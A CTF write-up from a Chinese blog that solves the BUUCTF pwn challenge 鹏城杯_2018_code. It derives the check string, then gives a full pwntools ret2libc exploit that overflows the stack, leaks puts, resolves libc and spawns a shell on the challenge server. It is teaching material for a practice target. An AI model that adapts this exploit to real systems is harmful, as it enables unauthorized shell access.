BUUCTF pwn 鹏城杯_2018_code

最新推荐文章于 2023-07-15 10:38:36 发布
最新推荐文章于 2023-07-15 10:38:36 发布
阅读量2.6w 收藏 1
点赞数 1
分类专栏: pwn安全 文章标签: python shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/111841021
版权

查看保护
在这里插入图片描述
程序流程
在这里插入图片描述
先输入name,然后通过对输入的字符串进行检测,通过后进入到have_fun()函数
在这里插入图片描述
check_str()函数要求输入的字符串ascii码在[65,90],[97,122],即字符‘A’-‘Z’和’a’-’z’;

另一个函数要求如下结果
在这里插入图片描述
这里可以写相应的python代码进行爆破(时间太长,可以测试查看规律)
在这里插入图片描述
相应的结果如下
在这里插入图片描述在这里插入图片描述
可以发现结果是递增的,并且
在这里插入图片描述
那么可以猜测进行测试
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
确定第一个为w,后面以从类推
在这里插入图片描述
那么输入‘wyBTs’即可成功通过检测
进入到have_fun函数,有简单的栈溢出,且没有canary
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
那么可以先泄露puts的地址,然后获得libc基地址,最后获得system和/bin/sh地址,最终获得shell

完整ex

from pwn import *

context(log_level='debug',arch='amd64')

#io=process("./2018_code")
io=remote("node3.buuoj.cn",25540)
elf=ELF("./2018_code")

io.recv()

io.sendline('wyBTs')

io.recv()

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

have_fun=0x400801

pop_rdi_ret=0x400983

payload=b'A'*(0x70+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(have_fun)

io.sendline(payload)

io.recvuntil(b'\x0a')

puts=u64(io.recv(6).ljust(8,b'\x00'))

print(hex(puts))

io.recv()

from LibcSearcher import *  

libc = LibcSearcher('puts',puts)  
#获取libc加载地址  
libc_base = puts - libc.dump('puts')  
#获取system地址  
system_addr = libc_base + libc.dump('system')  
#获取/bin/sh地址  
binsh_addr = libc_base + libc.dump('str_bin_sh')

ret=0x40055e

payload=b'A'*(0x70+8)+p64(ret)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)

io.sendline(payload)

io.recv()

io.interactive()
求是量子
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022鹏城杯CTF---Crypto
Luiino的博客
09-18 2190
第一部分,e与phi_n不互素,gcd(e,phi_n) == 4,此时e对phi_n没有逆元,但gcd(e//t,phi_n) == 1。mod n,由上面的for循环可以知道M与初始m的关系:M = m * (p-q-1)!对n进行分解,得到p、q,小的是q。记print(pow(m,e,n))里的m为M,故有c2 =第三部分, 看到M = 2022 * m * 1011 * p,又n = p*q,且c =记两输出结果分别为c1、c2,由print(pow(2,e,n))可以得到:c1 =
python实现银行ATM系统
m0_63138901的博客
09-05 8617
通过简单的python程序来实现ATM系统,其功能包括,存取款,余额查明以及退出功能,这些功能通过函数来封装,最后在写出窗口功能和循环。
2022鹏城杯CTF---Crypto wp
3tefanie丶zhou的博客
07-07 2174
【我们对别人,对这个世界,所有的误会,可能都来自三个字,”我觉得“。】
Python实验
weixin_53364209的博客
10-16 5647
Python实验
python学习之ATM系统
m0_74736506的博客
07-15 336
利用python实现ATM的基本功能
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
python编写银行自动提款系统
08-08
新手编写的银行自动提款系统,很多没有完善的地方,还需要多多改进
Python实现ATM系统
12-20
今天偶尔在知乎上看到某大佬用Python写的ATM系统案例,然后观摩了下他的实现思路和源码,感觉受益颇多,于是就根据自己的思路和目前掌握的Python编程基础将ATM实现了一下,以下是案例解析的过程: 案例剖析: 1.atm主页面显示. 2.账号验证. 3.查询余额. 4.存款. 5.取款. 6.修改密码. ps:我的思路是将以上的功能分成几大块,通过函数,循环和返回值来实现,话不多说直接上代码. 代码: 1.atm主页面显示 def index(nowUser): print('=' * 10, '自动存取款机', '=' * 10) print(getName(nowUser),
[鹏城杯 2022]Misc_water
m0_64444909的博客
03-19 280
这里的CRC指的是CRC32,也就是PNG图片的一个效验位,是一种不可逆运算,类似于MD5,作为数据效验或效验文件的完整性使用。(1). png的文件头:8个字节为 png的文件头(固定)(2). 4个字节十进制为13,代表头部数据块的长度为13(3). 4个字节ASCII码为IHDR,表明数据块为IHDR(4). 接下来是13位数据块(IHDR)前四个字节代表该图片的宽(不固定,可变)后四个字节代表该图片的高(不固定,可变)
python写一个模仿ATM存取款机系统(tkinter UI实现)
qq_43826939的博客
04-10 7027
需求 由于个人学习过程有个作业,需要做一个 ATM 系统,具体实现要求如下: 实现 使用 python3.8 、tkinter 在 pycharm 中开发 在初学时都一般选择在控制台输出,这里小的用了Python自带了tkinter 模块,是python自带的一个UI组件,类似于java的swing组件的感觉。 UI使用参考博客:https://www.jianshu.com/p/91......
python——银行自动提款机系统ATM
苦作舟的空城机
06-18 1万+
目录 管理员类Admin() 管理员Admin类最终代码 人类Person Person类最终代码 信用卡类Card Card类最终代码 ATM类 ATM类最终代码 main()方法 main()方法最终代码 银行自动提款机系统ATM演示效果 要制作一个简单的银行自动改提款机系统,首先要先分析有哪些类,各个类中有什么属性和行为 下面是各个类的设计方向 人 类名:P...
[BUUCTF-pwn] 鹏城杯_2018_overint
weixin_52640415的博客
02-08 849
老大的帽儿。题目分3部分,第1部分要求输入4个字节这4个字节经过运算得35 __int64 __fastcall sub_4007D1(__int64 a1, int a2) { int v3; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] v3 = 0; for ( i = 1; i < a2; ++i ) { printf("v[i] is %d\n", (unsigned int)*(char *)(i +
python银行业务办理时间_python3.6项目:银行存取款系统
weixin_39967598的博客
12-04 177
card1 ="1001"#卡号pwd1="1001"#密码ban1=10000#余额card2 ="1002"pwd2="1002"ban2=12000card3 ="1003"pwd3="1003"ban3=14000time1=0#输入错误次数time2=3#剩余输入次数while True:time1=time1+1time2=3-time1print("欢迎来到未来银行")card=in...
用python开发一个银行存取款系统
热门推荐
水亦流人必上的博客
06-05 1万+
#用python开发一个银行存取款系统 ka1='1001' #卡号 pa1='123456' #密码 ye1=1000 #余额 nb=0 #业务类型 qu=None #取款金额 cu=None #存款金额 sy=0 #输入次数 print('欢迎来到python银行') while True: #外无限循环 ka=input('请输入卡号:') pa=input('请输入密码:') ..
python模拟银行自助取款
u011234448的博客
10-09 1485
# 卡号 card1="1001" pwd1="123456" ban1=10000 card2="1002" pwd2="123456" ban2=10000 card3="1003" pwd3="123456" ban3=10000 print("欢迎来到python银行!") times=0 while True: card=input("请输入银行卡号!") pwd=input("请输入密码:") ban=0 # 余额 if card==card1 and pwd==p.
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值